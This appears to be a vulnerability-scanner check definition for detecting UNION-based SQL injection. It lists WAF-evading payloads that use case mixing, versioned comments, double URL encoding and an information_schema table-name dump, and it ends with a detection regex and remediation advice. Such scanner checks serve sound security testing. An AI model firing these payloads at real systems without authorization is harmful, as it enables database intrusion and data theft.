metadata:
    language: v2-beta
    name: "SQLi - UNION Based with WAF Bypass"
    description: "Tests for UNION-based SQL injection with column enumeration and WAF bypass techniques"
    author: "BCheck Arsenal"
    tags: "sqli", "union", "waf-bypass"

given insertion point then
    send payload:
        replacing: "{insertion_point}"
        following replacements:
            - "1'/*!50000oRdEr*/+/*!50000bY*/+10-- -"
            - "1'/*!50000uNiOn*/+/*!50000sElEcT*/+nUlL,nUlL,nUlL,nUlL-- -"
            - "1%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--"
            - "-1' uNiOn SeLeCt 1,gRoUp_cOnCaT(0x7e,tAbLe_nAmE,0x7e),3 fRoM iNfOrMaTiOn_ScHeMa.tAbLeS-- -"
            - "-1'/**/UNION/**/SELECT/**/1,2,3,4,5-- -"

    if {check.response} matches "(NULL|root@|information_schema|mysql\.user|pg_catalog)" then
        report issue:
            severity: high
            confidence: firm
            detail: "UNION-based SQL injection detected. The application returns data from injected UNION SELECT queries."
            remediation: "Use parameterized queries. Implement least-privilege database access."
    end if